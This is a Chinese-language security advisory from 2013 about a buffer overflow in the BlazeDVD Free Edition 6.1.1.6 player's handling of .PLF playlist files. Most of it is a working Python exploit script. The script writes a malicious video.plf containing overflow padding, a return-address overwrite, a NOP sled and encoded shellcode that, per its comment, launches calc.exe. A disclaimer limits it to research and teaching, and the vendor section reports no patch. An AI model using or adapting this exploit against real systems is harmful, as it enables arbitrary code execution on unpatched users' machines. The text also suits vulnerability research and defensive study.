发布日期:2013-03-28
更新日期:2013-03-30
受影响系统:
BlazeVideo BlazeDVD
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58761
BlazeDVD Free Edition是烈火数码影院,是一款DVD播放软件,它不仅支持DVD播放,还能支持VCD/SVCD/CD播放。
BlazeDVD Free Edition 6.1.1.6及其他版本在处理.PLF文件时存在远程缓冲区溢出漏洞,远程攻击者可利用此漏洞在应用的上下文中执行任意代码。
<*来源:metacom
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
# Exploit Title:BlazeDVD Free Edition 6.1.1.6 Buffer Overflow
# Date: 27-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage:
# Download version 6.1.0.6: ?product=BlazeDVD
# Version: BlazeDVD Free Edition 6.1.1.6
# Tested on: Windows 7 German
f=open("video.plf","w")
print "Creating expoit."
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
buffer= "\x41" * 260 # 260 608
eip= "\xeb\x8b\x65\x61" #61658beb
nop= "\x90" * 20
#CMD=calc.exe bad #\x00\x0a\x1a
shell= ("\xbf\x92\xce\xe9\xc9\xda\xd0\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x33\x31\x78\x12\x83\xe8\xfc\x03\xea\xc0\x0b\x3c\xf6\x35\x42"
"\xbf\x06\xc6\x35\x49\xe3\xf7\x67\x2d\x60\xa5\xb7\x25\x24\x46"
"\x33\x6b\xdc\xdd\x31\xa4\xd3\x56\xff\x92\xda\x67\x31\x1b\xb0"
"\xa4\x53\xe7\xca\xf8\xb3\xd6\x05\x0d\xb5\x1f\x7b\xfe\xe7\xc8"
"\xf0\xad\x17\x7c\x44\x6e\x19\x52\xc3\xce\x61\xd7\x13\xba\xdb"
"\xd6\x43\x13\x57\x90\x7b\x1f\x3f\x01\x7a\xcc\x23\x7d\x35\x79"
"\x97\xf5\xc4\xab\xe9\xf6\xf7\x93\xa6\xc8\x38\x1e\xb6\x0d\xfe"
"\xc1\xcd\x65\xfd\x7c\xd6\xbd\x7c\x5b\x53\x20\x26\x28\xc3\x80"
"\xd7\xfd\x92\x43\xdb\x4a\xd0\x0c\xff\x4d\x35\x27\xfb\xc6\xb8"
"\xe8\x8a\x9d\x9e\x2c\xd7\x46\xbe\x75\xbd\x29\xbf\x66\x19\x95"
"\x65\xec\x8b\xc2\x1c\xaf\xc1\x15\xac\xd5\xac\x16\xae\xd5\x9e"
"\x7e\x9f\x5e\x71\xf8\x20\xb5\x36\xf6\x6a\x94\x1e\x9f\x32\x4c"
"\x23\xc2\xc4\xba\x67\xfb\x46\x4f\x17\xf8\x57\x3a\x12\x44\xd0"
"\xd6\x6e\xd5\xb5\xd8\xdd\xd6\x9f\xba\x80\x44\x43\x13\x27\xed"
"\xe6\x6b")
try:
f.write(head+buffer+eip+nop+shell)
f.close()
print "File created"
except:
print "File cannot be created"
建议:
--------------------------------------------------------------------------------
厂商补丁:
BlazeVideo
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: